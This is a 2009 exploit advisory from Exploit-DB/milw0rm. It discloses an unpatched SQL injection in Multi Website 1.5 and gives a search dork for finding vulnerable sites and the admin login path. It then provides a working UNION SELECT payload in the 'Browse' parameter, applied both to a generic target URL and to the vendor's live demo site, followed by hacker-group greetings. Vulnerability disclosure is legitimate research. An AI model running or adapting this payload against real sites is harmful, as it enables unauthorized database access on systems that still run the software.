Multi Website 1.5 - index PHP action SQL Injection

EDB-ID:

9344




Platform:

PHP

Date:

2009-08-03


> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability
> >
> > [+] Script home : http://www.multi-website.com
> >
> > [+] Affected versions : 1.5
> >
> > [+] Solution : nothing .;
> > > >
> > > > =======================================================
> > > >
> > > > ==> AuThOr : SarboT511
> > > >
> > > > ==> EmaiL : xs3@hotmail.com
> > > >
> > > > ==> HomE : www.lezr.com
> > > >
> > > > ==> DorK : Powered by Multi Website 1.5
> > > >
> > > > ==> Control panel script : http://localhost/[path]/admin/login.php
> > > >
> > > > ========================================================
> > > >
> > > > ==> ExplO!t :
> > > >
> > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version--
> > > >=========================================================
> > > > L!VE Demo :
> > > >
> > >  http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version--
> > =============================================================
> > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil
> > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .#

# milw0rm.com [2009-08-03]